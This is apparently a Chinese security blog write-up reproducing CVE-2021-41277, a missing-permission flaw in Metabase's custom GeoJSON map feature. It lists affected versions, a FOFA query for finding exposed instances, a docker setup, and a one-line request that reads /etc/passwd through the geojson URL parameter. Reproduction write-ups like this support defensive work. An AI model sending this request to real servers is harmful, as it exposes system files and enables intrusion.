Metabase 敏感信息泄露漏洞(CVE-2021-41277)

metabase
漏洞复现
发布日期:   2021-11-21
更新日期:   2021-12-06
文章字数:   185
阅读时长:   1 分
阅读次数:  

Metabase 敏感信息泄露漏洞(CVE-2021-41277)

一、漏洞描述

metabase 是一个简单、开源的数据分析平台。

在受影响的版本中,自定义 GeoJSON 地图(admin->settings->maps->custom maps->add a map)操作缺少权限验证,攻击者可通过该漏洞获得敏感信息。该漏洞CVSS评分:9.9,危害等级:严重

CVE 编号

CVE-2021-41277

FOFA 查询app=”metabase”

二、影响范围

影响版本:

metabase version < 0.40.5
metabase version >= 1.0.0, < 1.40.5

修复版本:

metabase version >= 0.40.5
metabase version >= 1.40.5

三、漏洞复现

3.1 环境搭建

docker run -d -p 3000:3000 --name metabase metabase/metabase:v0.40.4

拉起环境

Index页面

3.2 EXP

Target IP:/api/geojson?url=file:/etc/passwd

image-20211128175503869

image-20211128175434887

文章作者: Taoing
文章链接: http://Ta0ing.github.io/article/94f0aed.html
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Taoing !
metabase
 上一篇
Apache ShenYu JWT认证缺陷漏洞(CVE-2021-37580) Apache ShenYu JWT认证缺陷漏洞(CVE-2021-37580)
由于ShenyuAdminBootstrap中JWT的错误使用,导致攻击者可以绕过身份验证,直接进入目标系统后台。
2021-11-22 漏洞复现
Apache ShenYu
下一篇 
Hadoop Yarn RPC未授权访问漏洞 Hadoop Yarn RPC未授权访问漏洞
Hadoop Yarn作为Hadoop核心组件之一,负责将资源分配至各个集群中运行各种应用程序,并调度不同集群节点上的任务执行。近日阿里云应急响应中心监测到 Hadoop Yarn RPC未授权访问漏洞在野利用事件。Hadoop Yarn默认对外开放RPC服务,攻击者可利用RPC服务执行任意命令,控制服务器。同时由于Hadoop Yarn RPC服务访问控制机制开启方式与REST API不一样,因此即使在 REST API有授权认证的情况下,RPC服务所在端口仍然可以未授权访问。阿里云应急响应中心提醒 Apache Hadoop 用户尽快采取安全措施阻止漏洞攻击。
2021-11-20 漏洞复现
Hadoop Yarn RPC
  目录